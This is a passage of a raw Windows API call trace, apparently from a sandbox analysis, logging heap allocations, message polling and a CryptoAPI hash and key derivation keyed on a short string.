(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0266.248] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0266.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51c58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0266.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.250] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0266.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.250] CryptHashData (hHash=0xa87310, pbData=0x2e54fc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.251] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cd0 [0266.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0266.251] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.252] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cb8 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.252] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51c40 [0266.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0266.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.257] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0266.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.258] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87650) returned 1 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 